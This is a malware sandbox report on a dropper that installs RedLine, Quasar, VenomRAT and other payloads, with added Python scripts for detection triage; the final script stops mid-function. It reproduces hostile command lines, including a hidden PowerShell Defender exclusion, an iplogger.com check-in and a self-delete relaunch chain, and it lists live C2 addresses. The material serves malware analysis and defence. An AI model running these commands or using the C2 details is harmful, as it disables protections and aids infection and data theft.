Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system -
submitted
28-10-2024 19:02
Static task
static1
Behavioral task
behavioral1
Sample
4363463463464363463463463.exe(3).exe
Resource
win7-20241023-en
General
-
Target
4363463463464363463463463.exe(3).exe
-
Size
10KB
-
MD5
2a94f3960c58c6e70826495f76d00b85
-
SHA1
e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
-
SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
-
SHA512
fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
-
SSDEEP
192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K
Malware Config
Extracted
Family: redline
Botnet: Pizdun
C2: 94.142.138.219:20936
auth_value: 20a1f7fe6575c6613ee7cc5d3025af70
Extracted
Family: quasar
Version: 1.4.1
Botnet: Office04
C2: Extazz24535-22930.portmap.host:22930
Mutex: 89f58ee5-7af9-42de-843f-2a331a641e3f
encryption_key: CD4F349DEB46AEE10C2FE886E5B2BD7A766723CE
install_name: 2klz.exe
log_directory: Logs
reconnect_delay: 3000
startup_key: Quasar Client Startup
subdirectory: SubDir
Extracted
Family: asyncrat
Version: Venom RAT + HVNC + Stealer + Grabber v6.0.3
Botnet: Default
C2: 62.113.117.95:4449
Mutex: hwelcvbupaqfzors
delay: 10
install: false
install_folder: %AppData%
Signatures
-
Asyncrat family
-
Quasar family
-
Quasar payload 2 IoCs
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\2klz.exe | family_quasar
behavioral2/memory/2696-373-0x0000000000030000-0x0000000000354000-memory.dmp | family_quasar
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
Processes:
resource | yara_rule
behavioral2/memory/3860-142-0x0000000000420000-0x0000000000452000-memory.dmp | family_redline
-
Redline family
-
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\XClient_protected.exe | VenomRAT
behavioral2/memory/2788-393-0x0000000000170000-0x0000000000192000-memory.dmp | VenomRAT
-
Venomrat family
-
Async RAT payload 1 IoCs
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\XClient_protected.exe | family_asyncrat
-
Blocklisted process makes network request 1 IoCs
Processes:
flow | pid | process
44 | 2652 | powershell.exe
-
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths or processes. Here the excluded path is C:\ProgramData, the directory the dropper copies itself into before relaunching.
Processes:
pid | process
2172 | powershell.exe
436 | powershell.exe
2652 | powershell.exe
2172 | powershell.exe
436 | powershell.exe
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 5 IoCs
Looks up the country code configured in the registry, most likely for geofencing.
Processes:
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | 4363463463464363463463463.exe(3).exe
Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | DCRatBuild127.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | WScript.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | jsawdtyjde.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | clamer.exe
-
Executes dropped EXE 19 IoCs
Processes:
pid | process
4000 | DCRatBuild127.exe
4660 | 1.exe
3028 | 2.exe
1908 | DCRatBuild127.exe
2020 | newfile.exe
432 | 360_.exe
1224 | 360_.exe
4588 | ef12ce34.exe
4052 | ef12ce34.exe
4520 | ipscan221.exe
2572 | jsawdtyjde.exe
3452 | clamer.exe
4276 | gsprout.exe
948 | thkdh.exe
2420 | wxha.exe
2696 | 2klz.exe
3416 | Client.exe
2788 | XClient_protected.exe
2212 | 2klz.exe
-
Loads dropped DLL 1 IoCs
Processes:
pid | process
4000 | DCRatBuild127.exe
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Windows Telemetry Crash Uploader = "C:\\ProgramData\\Telemetry.exe" | newfile.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\c321cbe9 = "C:\\ProgramData\\ef12ce34.exe" | 360_.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\c321cbe9 = "C:\\ProgramData\\ef12ce34.exe" | ef12ce34.exe
-
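The three registry writes above are the persistence the sandbox caught: a RunOnce value in the user hive with a Windows-sounding name, and a machine-wide Run value written through WOW6432Node (so by a 32-bit process) that both 360_.exe and its relocated copy ef12ce34.exe set. The script below is an added example, not part of the sandbox report and not the sandbox's own logic. It parses those exact lines into hive, autostart key, value name, target and writing process, groups by value so the re-write from the relocated copy shows as a second writer of one persistence item, and applies a few hunting heuristics (target under C:\ProgramData, random hex value name, vendor-like name, RunOnce) that are this script's assumptions rather than anything the report states.

```python
"""Parse 'Adds Run key' sandbox lines into persistence items and flag the odd ones.

Added example, not part of the sandbox report. Input lines are the report's
own; the heuristics in flags() are this script's assumptions.
"""
import re
from collections import defaultdict

# Copied from the 'Adds Run key to start application' signature. The sandbox
# doubles backslashes inside the quoted data value.
RUNKEY_LINES = [
    r'Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Windows Telemetry Crash Uploader = "C:\\ProgramData\\Telemetry.exe" newfile.exe',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\c321cbe9 = "C:\\ProgramData\\ef12ce34.exe" 360_.exe',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\c321cbe9 = "C:\\ProgramData\\ef12ce34.exe" ef12ce34.exe',
]

# Set value (<type>) <key ending in \Run or \RunOnce>\<name> = "<data>" <process>
LINE = re.compile(
    r'Set value \((?P<type>\w+)\) (?P<key>\\REGISTRY\\(?P<hive>USER|MACHINE)\\.*?'
    r'\\(?P<autostart>RunOnce|Run))\\(?P<name>.+?) = "(?P<data>.*)" (?P<process>\S+)$'
)


def parse_runkeys(lines):
    """One dict per parsable line; the target path is un-escaped for matching."""
    entries = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        entries.append({
            "scope": "HKCU" if m["hive"] == "USER" else "HKLM",
            "wow64": "\\WOW6432Node\\" in m["key"],   # written by a 32-bit process
            "autostart": m["autostart"],
            "name": m["name"],
            "target": m["data"].replace("\\\\", "\\"),
            "process": m["process"],
            "key": m["key"],
        })
    return entries


def flags(entry):
    """Hunting heuristics (assumptions): none of these alone proves malice."""
    reasons = []
    if entry["autostart"] == "RunOnce":
        reasons.append("runonce")                    # runs once, then the value is gone
    if entry["wow64"]:
        reasons.append("wow64-writer")
    if entry["target"].lower().startswith(r"c:\programdata"):
        reasons.append("target-under-programdata")   # user-writable, not an install dir
    if re.fullmatch(r"[0-9a-f]{6,}", entry["name"]):
        reasons.append("random-hex-name")
    if re.search(r"windows|microsoft", entry["name"], re.I):
        reasons.append("vendor-like-name")
    return reasons


def writers_by_value(entries):
    """Group by (key, name, target): the dropper and its relocated copy writing the
    same value become one persistence item with two writers."""
    groups = defaultdict(list)
    for e in entries:
        groups[(e["key"], e["name"], e["target"])].append(e["process"])
    return dict(groups)


if __name__ == "__main__":
    items = parse_runkeys(RUNKEY_LINES)
    for (key, name, target), writers in writers_by_value(items).items():
        first = next(e for e in items if e["key"] == key and e["name"] == name)
        print(f"{first['scope']} {first['autostart']}\\{name} -> {target}")
        print(f"   writers={writers} flags={flags(first)}")
```

The grouping matters for response: blocking only the first writer (360_.exe) leaves the value in place because the relocated copy rewrites it on start, so the item to remove is the value itself plus C:\ProgramData\ef12ce34.exe.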
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
Processes:
flow | ioc
56 | pastebin.com
58 | pastebin.com
140 | raw.githubusercontent.com
141 | raw.githubusercontent.com
14 | bitbucket.org
21 | bitbucket.org
43 | iplogger.com
44 | iplogger.com
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow | ioc
37 | ip-api.com
-
Suspicious use of SetThreadContext 3 IoCs
Processes:
description | pid | process | target process
PID 4660 set thread context of 3860 | 4660 | 1.exe | AppLaunch.exe
PID 432 set thread context of 1224 | 432 | 360_.exe | 360_.exe
PID 4588 set thread context of 4052 | 4588 | ef12ce34.exe | ef12ce34.exe
-
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\ipscan221.exe | upx
behavioral2/memory/4520-305-0x0000000000400000-0x000000000044B000-memory.dmp | upx
behavioral2/memory/4520-309-0x0000000000400000-0x000000000044B000-memory.dmp | upx
-
Drops file in Windows directory 1 IoCs
Processes:
description | ioc | process
File created | C:\Windows\Tasks\Test Task17.job | thkdh.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
pid | pid_target | process | target process
3596 | 4660 | WerFault.exe | 1.exe
-
System Location Discovery: System Language Discovery 1 TTPs 23 IoCs
Attempts to gather information about the system language of the victim in order to infer the geographical location of that host.
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | one entry per process listed below (23 entries)
4363463463464363463463463.exe(3).exe, powershell.exe, 360_.exe, powershell.exe, gsprout.exe, DCRatBuild127.exe, cmd.exe, DCRatBuild127.exe, AppLaunch.exe, 360_.exe, thkdh.exe, Client.exe, 1.exe, cmd.exe, powershell.exe, PING.EXE, ef12ce34.exe, ef12ce34.exe, 2.exe, WScript.exe, cmd.exe, ipscan221.exe, wxha.exe
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
pid | process
4004 | PING.EXE
3108 | cmd.exe
-
NSIS installer 2 IoCs
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\DCRatBuild127.exe | nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\Files\DCRatBuild127.exe | nsis_installer_2
-
Modifies registry class 1 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings | DCRatBuild127.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 27 IoCs
Processes:
pid | process | entries (identical entries collapsed; 27 in total)
3028 | 2.exe | 14
2652 | powershell.exe | 3
1224 | 360_.exe | 2
2172 | powershell.exe | 3
4052 | ef12ce34.exe | 2
436 | powershell.exe | 3
-
Suspicious use of AdjustPrivilegeToken 8 IoCs
Processes:
description | pid | process
Token: SeDebugPrivilege | 3136 | 4363463463464363463463463.exe(3).exe
Token: SeDebugPrivilege | 2652 | powershell.exe
Token: SeDebugPrivilege | 2020 | newfile.exe
Token: SeDebugPrivilege | 2172 | powershell.exe
Token: SeDebugPrivilege | 436 | powershell.exe
Token: SeDebugPrivilege | 2696 | 2klz.exe
Token: SeDebugPrivilege | 2788 | XClient_protected.exe
Token: SeDebugPrivilege | 2212 | 2klz.exe
-
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
pid | process
2212 | 2klz.exe
-
Suspicious use of SendNotifyMessage 1 IoCs
Processes:
pid | process
2212 | 2klz.exe
-
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
pid | process
4520 | ipscan221.exe
4520 | ipscan221.exe
2212 | 2klz.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
pid | process | target pid | target process | writes (identical entries collapsed; 64 in total)
3136 | 4363463463464363463463463.exe(3).exe | 4000 | DCRatBuild127.exe | 3
4000 | DCRatBuild127.exe | 2512 | cmd.exe | 3
2512 | cmd.exe | 4660 | 1.exe | 3
2512 | cmd.exe | 3028 | 2.exe | 3
2512 | cmd.exe | 1908 | DCRatBuild127.exe | 3
2512 | cmd.exe | 2652 | powershell.exe | 3
1908 | DCRatBuild127.exe | 5020 | WScript.exe | 3
3136 | 4363463463464363463463463.exe(3).exe | 2020 | newfile.exe | 2
4660 | 1.exe | 3860 | AppLaunch.exe | 5
5020 | WScript.exe | 1592 | cmd.exe | 3
3136 | 4363463463464363463463463.exe(3).exe | 432 | 360_.exe | 3
432 | 360_.exe | 1224 | 360_.exe | 10
1224 | 360_.exe | 2172 | powershell.exe | 3
1224 | 360_.exe | 3108 | cmd.exe | 3
3108 | cmd.exe | 4004 | PING.EXE | 3
3108 | cmd.exe | 4588 | ef12ce34.exe | 3
4588 | ef12ce34.exe | 4052 | ef12ce34.exe | 8
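The SetThreadContext and WriteProcessMemory signatures above hold the injection story of this sample, but as a flat list of repeated lines. The script below is an added example, not part of the sandbox report and not the sandbox's own detection logic. It parses the raw record text, counts remote writes per injector/target pair, and flags the pairs that also received a SetThreadContext from the same source, which is the write-then-redirect sequence of process hollowing; it then walks the writer chain back to the submitted sample. The records are the report's own, reproduced with the number of times each line repeats; the interpretation (SetThreadContext after remote writes marks a hollowed target, and the 2 to 3 writes seen here for a plain spawn versus 5 to 10 for a hollowed child) is this script's assumption, drawn from this one report.

```python
"""Reconstruct injector -> target pairs from flattened sandbox signature text.

Added example, not part of the sandbox report. The record strings are the
report's own; the hollowing heuristic is this script's assumption.
"""
import re
from collections import Counter

# Copied from the WriteProcessMemory signature. The sandbox prints one line per
# call, so identical lines repeat; the integer is the repeat count in the report.
WRITE_RECORDS = [
    ("PID 3136 wrote to memory of 4000 3136 4363463463464363463463463.exe(3).exe DCRatBuild127.exe", 3),
    ("PID 4000 wrote to memory of 2512 4000 DCRatBuild127.exe cmd.exe", 3),
    ("PID 2512 wrote to memory of 4660 2512 cmd.exe 1.exe", 3),
    ("PID 2512 wrote to memory of 3028 2512 cmd.exe 2.exe", 3),
    ("PID 2512 wrote to memory of 1908 2512 cmd.exe DCRatBuild127.exe", 3),
    ("PID 2512 wrote to memory of 2652 2512 cmd.exe powershell.exe", 3),
    ("PID 1908 wrote to memory of 5020 1908 DCRatBuild127.exe WScript.exe", 3),
    ("PID 3136 wrote to memory of 2020 3136 4363463463464363463463463.exe(3).exe newfile.exe", 2),
    ("PID 4660 wrote to memory of 3860 4660 1.exe AppLaunch.exe", 5),
    ("PID 5020 wrote to memory of 1592 5020 WScript.exe cmd.exe", 3),
    ("PID 3136 wrote to memory of 432 3136 4363463463464363463463463.exe(3).exe 360_.exe", 3),
    ("PID 432 wrote to memory of 1224 432 360_.exe 360_.exe", 10),
    ("PID 1224 wrote to memory of 2172 1224 360_.exe powershell.exe", 3),
    ("PID 1224 wrote to memory of 3108 1224 360_.exe cmd.exe", 3),
    ("PID 3108 wrote to memory of 4004 3108 cmd.exe PING.EXE", 3),
    ("PID 3108 wrote to memory of 4588 3108 cmd.exe ef12ce34.exe", 3),
    ("PID 4588 wrote to memory of 4052 4588 ef12ce34.exe ef12ce34.exe", 8),
]
# Copied from the SetThreadContext signature.
CONTEXT_RECORDS = [
    "PID 4660 set thread context of 3860 4660 1.exe AppLaunch.exe",
    "PID 432 set thread context of 1224 432 360_.exe 360_.exe",
    "PID 4588 set thread context of 4052 4588 ef12ce34.exe ef12ce34.exe",
]
SIGNATURE_TEXT = " ".join(
    [line for line, n in WRITE_RECORDS for _ in range(n)] + CONTEXT_RECORDS
)

# "PID <src> <op> <dst> <src> <src image> <dst image>"; image names carry no spaces here.
RECORD = re.compile(
    r"PID (?P<src>\d+) (?P<op>wrote to memory of|set thread context of) "
    r"(?P<dst>\d+) (?P=src) (?P<src_img>\S+) (?P<dst_img>\S+)"
)


def parse_records(text):
    """Return (src_pid, op, dst_pid, src_image, dst_image) tuples from flattened text."""
    return [(int(m["src"]), m["op"], int(m["dst"]), m["src_img"], m["dst_img"])
            for m in RECORD.finditer(text)]


def write_counts(records):
    """Remote writes per (injector, target). In this report a plain CreateProcess
    spawn shows 2-3 writes; mapping a whole PE into a suspended child shows more."""
    counts = Counter()
    for src, op, dst, _, _ in records:
        if op == "wrote to memory of":
            counts[(src, dst)] += 1
    return counts


def find_hollowing(records):
    """Targets that received remote writes AND a SetThreadContext from the same
    source. Same image on both sides is the loader unpacking into a copy of
    itself; a different host image (AppLaunch.exe here, whose dump carries the
    family_redline hit) is the payload hiding in a legitimate .NET binary."""
    writes = write_counts(records)
    hits = []
    for src, op, dst, src_img, dst_img in records:
        if op == "set thread context of" and writes[(src, dst)]:
            hits.append({
                "injector": (src, src_img),
                "target": (dst, dst_img),
                "writes": writes[(src, dst)],
                "kind": "self-hollow" if src_img == dst_img else "hosted-in-other-image",
            })
    return hits


def ancestry(records, pid):
    """Walk the first writer of each PID upward so an injected target can be tied
    back to the submitted sample (the root has no writer)."""
    parent = {}
    for src, op, dst, _, _ in records:
        if op == "wrote to memory of":
            parent.setdefault(dst, src)
    chain = [pid]
    while chain[-1] in parent:
        chain.append(parent[chain[-1]])
    return chain


if __name__ == "__main__":
    recs = parse_records(SIGNATURE_TEXT)
    for hit in find_hollowing(recs):
        print(hit["kind"], hit["injector"], "->", hit["target"],
              f"{hit['writes']} writes, chain {ancestry(recs, hit['target'][0])}")
```

The chain output is what ties the YARA hits to the tree: the RedLine dump at behavioral2/memory/3860-142 belongs to AppLaunch.exe, which has no file on disk and only makes sense once 1.exe is known to have written into it and redirected its thread.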
Processes
-
Depth 1: C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe(3).exe
Command line: "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe(3).exe"
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 3136
-
Depth 2: C:\Users\Admin\AppData\Local\Temp\Files\DCRatBuild127.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\Files\DCRatBuild127.exe"
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID: 4000
-
Depth 3: C:\Windows\SysWOW64\cmd.exe
Command line: "cmd" /c start "" "1.exe" & start "" "2.exe" & start "" "DCRatBuild127.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1w25559q45"
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID: 2512
-
Depth 4: C:\Users\Admin\AppData\Local\Temp\1.exe
Command line: "1.exe"
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID: 4660
-
Depth 5: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Command line: "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
- System Location Discovery: System Language Discovery
PID: 3860
-
Depth 5: C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4660 -s 152
- Program crash
PID: 3596
-
Depth 4: C:\Users\Admin\AppData\Local\Temp\2.exe
Command line: "2.exe"
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID: 3028
-
Depth 4: C:\Users\Admin\AppData\Local\Temp\DCRatBuild127.exe
Command line: "DCRatBuild127.exe"
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID: 1908
-
Depth 5: C:\Windows\SysWOW64\WScript.exe
Command line: "C:\Windows\System32\WScript.exe" "C:\wincrtDll\Kiq5HCXulld4.vbe"
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID: 5020
-
Depth 6: C:\Windows\SysWOW64\cmd.exe
Command line: C:\Windows\system32\cmd.exe /c ""C:\wincrtDll\3K4aPY2c2MDUmgYCS2.bat" "
- System Location Discovery: System Language Discovery
PID: 1592
-
Depth 4: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1w25559q45"
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 2652
-
Depth 2: C:\Users\Admin\AppData\Local\Temp\Files\newfile.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\Files\newfile.exe"
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID: 2020
-
Depth 2: C:\Users\Admin\AppData\Local\Temp\Files\360_.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\Files\360_.exe"
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID: 432
-
Depth 3: C:\Users\Admin\AppData\Local\Temp\Files\360_.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\Files\360_.exe"
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID: 1224
-
Depth 4: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell.exe -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:\ProgramData"
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 2172
-
Depth 4: C:\Windows\SysWOW64\cmd.exe
Command line: cmd.exe /c (ping -n 10 127.0.0.1) & (del /F /Q "C:\Users\Admin\AppData\Local\Temp\Files\360_.exe") & (start "" "C:\ProgramData\ef12ce34.exe")
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID: 3108
-
Depth 5: C:\Windows\SysWOW64\PING.EXE
Command line: ping -n 10 127.0.0.1
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID: 4004
-
Depth 5: C:\ProgramData\ef12ce34.exe
Command line: "C:\ProgramData\ef12ce34.exe"
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID: 4588
-
Depth 6: C:\ProgramData\ef12ce34.exe
Command line: "C:\ProgramData\ef12ce34.exe"
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID: 4052
-
Depth 7: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell.exe -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:\ProgramData"
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 436
-
Depth 2: C:\Users\Admin\AppData\Local\Temp\Files\ipscan221.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\Files\ipscan221.exe"
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID: 4520
-
Depth 2: C:\Users\Admin\AppData\Local\Temp\Files\jsawdtyjde.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\Files\jsawdtyjde.exe"
- Checks computer location settings
- Executes dropped EXE
PID: 2572
-
Depth 3: C:\Windows\system32\cmd.exe
Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat" "
PID: 1312
-
Depth 4: C:\Users\Admin\AppData\Local\Temp\RarSFX0\clamer.exe
Command line: clamer.exe -priverdD
- Checks computer location settings
- Executes dropped EXE
PID: 3452
-
Depth 5: C:\Users\Admin\AppData\Local\Temp\RarSFX1\thkdh.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\RarSFX1\thkdh.exe"
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID: 948
-
Depth 2: C:\Users\Admin\AppData\Local\Temp\Files\gsprout.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\Files\gsprout.exe"
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID: 4276
-
Depth 2: C:\Users\Admin\AppData\Local\Temp\Files\2klz.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\Files\2klz.exe"
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID: 2696
-
Depth 3: C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe
Command line: "C:\Users\Admin\AppData\Roaming\SubDir\2klz.exe"
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID: 2212
-
Depth 2: C:\Users\Admin\AppData\Local\Temp\Files\Client.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\Files\Client.exe"
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID: 3416
-
Depth 2: C:\Users\Admin\AppData\Local\Temp\Files\XClient_protected.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\Files\XClient_protected.exe"
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID: 2788
-
Depth 1: C:\Windows\SysWOW64\WerFault.exe
Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4660 -ip 4660
PID: 3476
-
Depth 1: C:\ProgramData\qhaflu\wxha.exe
Command line: C:\ProgramData\qhaflu\wxha.exe
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID: 2420
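The process tree above carries the command lines that matter for detection: a hidden, bypass-policy PowerShell adding a Defender exclusion for C:\ProgramData, a cmd chain that uses a loopback ping as a sleep before deleting the dropper and relaunching its copy, an iplogger.com check-in through Invoke-WebRequest, and WScript.exe running a .vbe out of C:\wincrtDll. The script below is an added example, not part of the sandbox report and not the sandbox's own rules. It runs rule-based triage over those exact command lines plus two constructed benign controls and maps each hit to the ATT&CK sub-technique it would be filed under; the rule patterns, the five-ping threshold and the technique mapping are this script's choices.

```python
"""Rule-based triage of the command lines from the process tree above.

Added example, not part of the sandbox report. CMDLINES[0:6] are copied from
the tree; the last two are constructed benign controls. Rule thresholds and
the ATT&CK mapping are this script's choices.
"""
import re

CMDLINES = [
    r'"cmd" /c start "" "1.exe" & start "" "2.exe" & start "" "DCRatBuild127.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1w25559q45"',
    r'powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1w25559q45"',
    r'powershell.exe -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:\ProgramData"',
    r'cmd.exe /c (ping -n 10 127.0.0.1) & (del /F /Q "C:\Users\Admin\AppData\Local\Temp\Files\360_.exe") & (start "" "C:\ProgramData\ef12ce34.exe")',
    r'"C:\Windows\System32\WScript.exe" "C:\wincrtDll\Kiq5HCXulld4.vbe"',
    r'ping -n 10 127.0.0.1',
    r'ping -n 4 10.0.0.1',                           # constructed: ordinary reachability check
    r'powershell.exe -command "Get-MpPreference"',   # constructed: read-only Defender query
]

# Hosts the report lists under 'Legitimate hosting services abused'.
ABUSED_HOSTS = r"(iplogger\.com|pastebin\.com|raw\.githubusercontent\.com|bitbucket\.org)"
LOOPBACK_PING = re.compile(r"\bping(\.exe)?\s+-n\s+(?P<count>\d+)\s+127\.0\.0\.1\b", re.I)
MIN_SLEEP_PINGS = 5  # assumption: 5+ pings to loopback is a delay loop, not a connectivity test


def loopback_ping_sleep(cmd):
    m = LOOPBACK_PING.search(cmd)
    return bool(m) and int(m["count"]) >= MIN_SLEEP_PINGS


# (rule name, ATT&CK sub-technique, predicate). Regex rules use the bound .search method.
RULES = [
    ("defender-exclusion", "T1562.001",
     re.compile(r"\b(Add|Set)-MpPreference\b.*-(Exclusion(Path|Process|Extension)|Disable\w+)", re.I).search),
    ("powershell-hidden-bypass", "T1059.001",
     re.compile(r"\bpowershell(\.exe)?\b.*(-W(indowStyle)?\s+Hidden|-Exec(utionPolicy)?\s+Bypass)", re.I).search),
    ("web-service-beacon", "T1102",
     re.compile(r"https?://" + ABUSED_HOSTS + r"/", re.I).search),
    ("wscript-vbe", "T1059.005",
     re.compile(r"\bWScript\.exe\b.*\.vb[es]\b", re.I).search),
    ("self-delete-after-delay", "T1070.004",
     re.compile(r"\bping\b.*127\.0\.0\.1.*\bdel\s+/F\s+/Q\b.*\bstart\b", re.I).search),
    ("loopback-ping-sleep", "T1497.003", loopback_ping_sleep),
]


def triage(cmdline):
    """Return [(rule, technique)] for every rule whose predicate matches, in RULES order."""
    return [(name, tech) for name, tech, match in RULES if match(cmdline)]


def technique_coverage(cmdlines):
    """Sorted, de-duplicated ATT&CK IDs observed across all command lines."""
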